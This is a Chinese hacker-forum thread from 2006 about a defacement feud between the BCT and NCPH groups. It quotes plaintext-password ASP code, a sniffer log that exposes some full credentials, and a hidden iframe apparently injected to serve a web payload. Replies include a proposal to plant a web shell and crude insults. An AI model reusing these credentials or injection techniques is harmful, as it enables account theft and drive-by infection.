[灌水]借贵地发一贴 希望说说看过后的感受
文章作者:看看这个N.C.P.H是个什么鸟全部个人观点 不代表任何组织 有啥墨迹的跟俺一个人说
前几天有个傻B把BCT的首页替换了,很叼是不?还要帮别人做广告,你这样的殷勤没人领情的,那么看看你们自己是个什么货色吧!
这是在他们网站上的登陆页面找到的代码
[code]set conn=server.createobject("adodb.connection")
conn.connectionstring="Provider = Microsoft.jet.OLEDB.4.0 ; Data Source = "& Server.Mappath ("ncphbbs/user.asp")
conn.open
sqltj="insert into username1 (strUsername,strPassword)values('"&strUsername&"','"&strPassword&"')"
conn.execute(sqltj)
Else
intForumID = 0
End If
[/code]
明白的朋友知道这是做什么的,不明白的朋友我就给解释一下,你在论坛注册之后你的帐号密码会被记录在数据库里,注意是明文记录的,这意味着什么,只要你在这里有点不小心,很可能你的QQ 你的内部帐号以及其他种种机密都会泄露,也难怪有的内部论坛信息外泄了.
好了,这是不是没什么?那在看看另外一个秘密
这家伙对自己服务器上的,以及同网段的其他机器也不放过,在一个隐蔽目录里发现如下好东西
[code]
pass.txt
Password:20023118
Username:
Password:
Username:qqqwww
Password:qqqwww
Username:cql_0981
Password:3330981
Username:cql_0981
Password:3330981
Username:
pass.log
TCP [06/30/06 16:52:54]
125.73.131.188->222.186.81.2 Port: 48938->80
HOST: babyjh.com USER: %D3%F1%B6%F9****%D3%C6, PASS: dss****5
TCP [06/30/06 19:11:09]
61.147.149.130->222.186.81.2 Port: 13054->21
PASS yuyingqicom1****
TCP [06/30/06 19:12:00]
61.147.149.130->222.186.81.2 Port: 13056->21
USER anon****
TCP [06/30/06 19:12:00]
61.147.149.130->222.186.81.2 Port: 13057->21
USER ano****s
TCP [06/30/06 19:12:07]
61.147.149.130->222.186.81.2 Port: 13058->21
USER m****
[/code]
不明白的话我也解释一下,这是嗅叹本段下的敏感密码 牛B吧,据说还是朋友服务器,那更牛B了
传个图作个证据
[img]http://www.loveshell.net/blog/attachments/month_200607/25_111232_wtlzncph.jpg[/img] *** 作者被禁止或删除 内容自动屏蔽 *** NCPH人品不好,居然还在自己站点记录用户密码,呵呵,以此推出,他们的软件里面很可能也有后门,那用过他们软件的人自己小心咯,哈哈
记得EST要求的贵宾首先是人品,貌似NCPH的人在EST还是荣誉会员组的,希望管理员考虑下撤销之 B.C.T放在虚拟服务器上,没办法设置。被替换也可以说没办法。
但至少不会象NCPH那样记录别人的密码。貌似2楼的很同意这样的做法,也属于这类人? *** 作者被禁止或删除 内容自动屏蔽 *** 打来打去有什么意思啊,你入侵我,我入侵你,结果侵来侵去就是网上那些免费的脚本程序,只要重要数据不被破坏一笑了之吧。明文保存密码是他的权利,大家不上他的网就行了,再说有谁只用一个密码的啊,自己的安全自己负责。 [s:82] 引用某马甲的一句话“真是人贱无敌啊”对了,顺便问句,NCPH是什么东东。? 我靠,一段时间不来EST一来就/。/// 剑心``有点火气了啊/
```呵呵 ♪我鄙视♪ [b]希望N.C.P.H的成员能出来做一下解释。[/b] 把黑别人站点当作宣传站点技术的方式 是一种愚昧的表现
追求技术 倡导原创 本着这样的理念 去做一些小动作 呵呵
何为技术 何为原创 ...? 哲学好好学一下吧 !! 哈 剑心确实要怒了~~~~ 不过好象NCPH的还没承认吧 有朋友说可能是冒充 但愿吧! [s:52] 以个人名义先支持一下BCT的兄弟 我说上次去 BCT 找篇文章的时候,怎么发现变成 宣传 N.C.P.H 的了。。
当时也没多想什么 就退出来了。。没把这事放在心上。。原来是这么回事啊。。
我相信剑心的人品。。。和 sunwear 一样。。以个人名义 支持 剑心。。。 *** 作者被禁止或删除 内容自动屏蔽 *** 中国牛黑之一的剑心火了,小心人家一剑刺穿你心 [s:77]
NCPH我不是很了解,所以我也不能说什么,而上文说的嗅探什么的也可能是别的来参观游览的人放的,中国的几个安全团队里面人也不少,肯定素质良莠不齐,而且还不乏挑衅离间之辈,剑心还是慎重点吧 我也相信Bug.Center.Team 相信h4k_b4n所领导的小组 相信玄猫等成员
EST论坛贵宾:“凋凌玫瑰”不就是N.C.P.H的人吗?他有必要出来解释一下吧 好热闹啊~我现在虽然不是N.C.P.H的成员了,但还是想说几句公道话。
to bct:
bct被黑很正常啊,所谓树大招风,有几个所谓的“黑客”站点没被黑过呢。你们骂来骂去有意思么,还帖个shell出来。是谁的人品有问题啊,黑就黑呗,有能耐就别被黑啊,这点道理连小p孩都知道,说白了,还不是要面子啊。
to ncph:
记录别人的密码的确是可耻的,不晓得事情的真相,所以无发言权了。如果真是这样,那我离开ncph是对的。
以上代表个人观点。 现在 NCPH 论坛顶上
<iframe height=0 width=0 src="[url]http://www.yeworld.net/Text/Lib.Html[/url]"></iframe>
建议挂个DIRshell 比较爽! 不支持楼上的建议哦...你挂个dirshell造成破坏的对象不止是NCPH的人..
而是连无辜的网民也一起被害..
我认识那个凋零玫瑰...他人还是不错的....我个人感觉这件事应该不是他所为...不过记录明文密码就不应该了..不知道程序是不是他们自己写的..故意这样的..
Bug.Center.Team现在的数据好象没了..是不是他们的人删的?
剑心的那个shell不错..去angel的站点下了个2006的..可惜跟你的不一样..难道是内部版?不知可否放出来用下呢? 我现在来看看~! 真的挺没劲的.. 题外话:
记得原来八进制出了一点问题的时候。有人发帖子说这个事情。
执行管理EvilOctal好像说,希望认识那个进入的人,并请他指导交流。
那个贴子我找不到了。可惜。
bct好像也出了一点小问题。他们这么说,[url]http://www.cnbct.org/[/url]
[quote]Because servers were attacked, temporarily unable to visit . Maybe Someone will so happy for this.
Anyway,Hei "Hacker" Maybe you will say:" Bug.Center.Team Is So Bad!" But You Too.
NCPH? Just Your Mother Fucker .in China Your Team Just ASS Hole
[/quote]
看来矛盾很大了。bct好像一直以来以擅长web漏洞攻防享誉。
而ncph好像重点不在web。
所以感觉即使ncph主页出问题也没有bct主页出问题震撼。
破坏容易,建造艰难。
个人表示遗憾。祝福早些恢复。 [quote][b]这里是引用第[/b][color=#ff0000][22 楼][/color][b]的[color=#000066]fhod[/color]于[/b]2006-07-25 22:31[b]发表的:[/b]
不支持楼上的建议哦...你挂个dirshell造成破坏的对象不止是NCPH的人..
而是连无辜的网民也一起被害..
我认识那个凋零玫瑰...他人还是不错的....我个人感觉这件事应该不是他所为...不过记录明文密码就不应该了..不知道程序是不是他们自己写的..故意这样的..
.......[/quote]
[url]http://www.loveshell.net/blog/blogview.asp?logID=119[/url]
不知道这个算不算是回复了!哈哈哈~~~~~人也会有看错的一天!这个可能是你的转折点
AW:NCPH?我知道,而且也知道你们很厉害!那也不难怪!你们是SK当中的CR(Changer/Copyer)~我们只是SK~比不上你N份之一。不过说实在的!黑我们站~也太无聊了!有种就去黑了破庙!不就是无聊所作~唉~~~~~喜欢做秀而已嘛,我知道的了! [quote][b]这里是引用第[/b][color=#ff0000][25 楼][/color][b]的[color=#000066]金州[/color]于[/b]2006-07-26 00:16[b]发表的:[/b]
题外话:
记得原来八进制出了一点问题的时候。有人发帖子说这个事情。
执行管理EvilOctal好像说,希望认识那个进入的人,并请他指导交流。
那个贴子我找不到了。可惜。
.......[/quote]
金洲兄弟人员太好了 NCPH什么东西? [quote][b]这里是引用第[/b][color=#ff0000][28 楼][/color][b]的[color=#000066]neeao[/color]于[/b]2006-07-26 10:33[b]发表的:[/b]
NCPH什么东西?[/quote]
呵呵``neeao不知道 么?BAN 不是说了么
AW:NCPH?我知道,而且也知道你们很厉害!那也不难怪!你们是SK当中的CR(Changer/Copyer)~我们只是SK~比不上你N份之一。不过说实在的!黑我们站~也太无聊了!有种就去黑了破庙!不就是无聊所作~唉~~~~~喜欢做秀而已嘛,我知道的了!
个人认为 NCPH 不应该首先挂了 BCT 的首页,私下告诉BCT 一下就好了 为什么一定要换首页呢?
BCT 是个出名的组织。。这样似乎不太好。呵呵``
最后希望这件事情能和平解决。。
PS:以上只代表个人意见。。不代表任何组织。。 [quote][b]这里是引用第[/b][color=#ff0000][26 楼][/color][b]的[color=#000066]h4k_b4n[BCT][/color]于[/b]2006-07-26 01:14[b]发表的:[/b]
[url]http://www.loveshell.net/blog/blogview.asp?logID=119[/url]
不知道这个算不算是回复了!哈哈哈~~~~~人也会有看错的一天!这个可能是你的转折点
.......[/quote]
做为擅长web漏洞攻防的知名小组BCT出了这样的事情 做为领头人 h4k_b4n兄以及小组成员是否该反思一下?一味的抱怨和叫骂对于BCT的发展似乎没什么好处吧(就像以前有人COPY了BCT的原创资料后你在EST上发帖叫骂对方一样,最后事情还是不了了之) 对问题的反思应该比抱怨,愤怒等情绪更重要吧
先声明:h4k_b4n是老朋友了 我支持BCT 支持BCT,也支持NCPH,大家都是学技术的,打来打去没什么必要,BCT和NCPH都是不小的安全技术站点,有什么矛盾至于如此,不能和平解决阿!今天你换我的主页,明天我干你论坛,有意义么。有这个时间不能好好研究研究技术阿。而且不排除有人挑拨的嫌疑。双方应该冷静下来好好谈谈。。。。。。。。 其实黑了也就黑了
没啥。。。
都没啥。挂DIRSHELL的想法不支持。
没有太大的仇恨,这样做是没有必要的。
BCT是虚拟机,又不是自己的服务器。
根本没有权限去设置这些东西。
所以黑了BCT应该是啥子都算不上。。
BCT里面就只有那么二十多个会员,现在加上受到邀请的,论坛上在的人也就40多个。。
根本也不存在外面说的那些树大招风,等等。
而且里面也没有啥子内部资料。
也没有像某些朋友问我的:“里面是不是有些没公开的漏洞,等你们玩够了,再放出来呢?”
没有,肯定是没有的。
只是在里面讨论一下问题。
大家互相帮助一下,在里面。
我觉得BCT的域名可以换换了,呵呵,免得确实太出名了一点哈。哈哈。。
那个什么什么组织。
里面RP有问题的是不是太多了一点
什么原创。什么都标明是原创。有多少是自己真正的原创呢?
打口水战,是没有意思的。。
我想这个事情过了就这么过了吧
反正大家都没有什么损失
那个什么组织既然这么想出名
我建议 ban兄弟把BCT的主页就写上他们的名字。
然后就一直保持下去。 真热闹! 不想骂人?表避我! *** 作者被禁止或删除 内容自动屏蔽 *** *** 作者被禁止或删除 内容自动屏蔽 *** [quote][b]这里是引用第[/b][color=#ff0000][35 楼][/color][b]的[color=#000066]那小子真菜[/color]于[/b]2006-07-26 17:03[b]发表的:[/b]
to sgl
我指着你 sgl
我操你那个娘,ban大他们都是文明人,不和你们这群贱B一般见识!我就吃不了这个气.你都不在ncph你撒个J8屁啊.
你是不是在里面学吃粪吃多了.我早就听说你们ncph的人以吃粪为主.你吃多了多出去溜溜啊,别在这里写J8不管用的帖子.[/quote]
bct的人都这么没素质吗? 继续骂吧,还有什么难听的,都说出来,最好一个帖子都解决了,我也想知道,你这个无赖除了骂人,还会什么?
我草,我不想骂人,但你个j8鸟人,就会tmd的说这种没教养的话,我想对你说:“草死你妈!”
一群sb 。。。。 大家语气都不能太激动了。。
不能这样骂来骂去的。。
毕竟 EST 不是你们的骂场。。。
有问题可以私下解决。。。
如果要骂的话 建议开个群。。。里面随便怎么骂。。这样还方便点呢。。
两个组织都很有名。。不要在这里破坏大家对你们的印象。。。
页:
[1]